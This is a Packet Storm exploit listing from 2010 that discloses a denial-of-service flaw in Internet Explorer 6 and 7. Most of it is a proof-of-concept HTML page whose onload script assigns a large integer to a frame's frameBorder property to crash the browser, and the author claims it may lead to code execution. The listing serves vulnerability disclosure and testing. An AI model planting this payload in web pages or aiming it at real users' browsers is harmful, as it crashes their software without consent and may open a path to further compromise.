Internet Explorer 6/7 Denial Of Service

2010-07-28T00:00:00
ID PACKETSTORM:92220
Type packetstorm
Reporter Richard Leahy
Modified 2010-07-28T00:00:00

Description

                                        
                                            `# Exploit Title: IE6 / 7 Remote Dos vulnerability  
# Date: 27/07/2010  
# Author: Richard leahy  
# Version: 6 / 7  
# Tested on: Windows Xp Sp3  
#category Remote Dos, might lead to code execution.  
  
# The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder   
causing a dos and may lead to code execution.  
  
#code  
  
<html>  
<head>  
<script>  
  
function dos(){  
  
var e = document.createElement('frame');  
var prop = 'frameBorder';  
  
e[prop] = 0123456789;  
}  
  
</script>  
</head>  
<body onload="dos()">  
</body>  
  
</html>  
  
`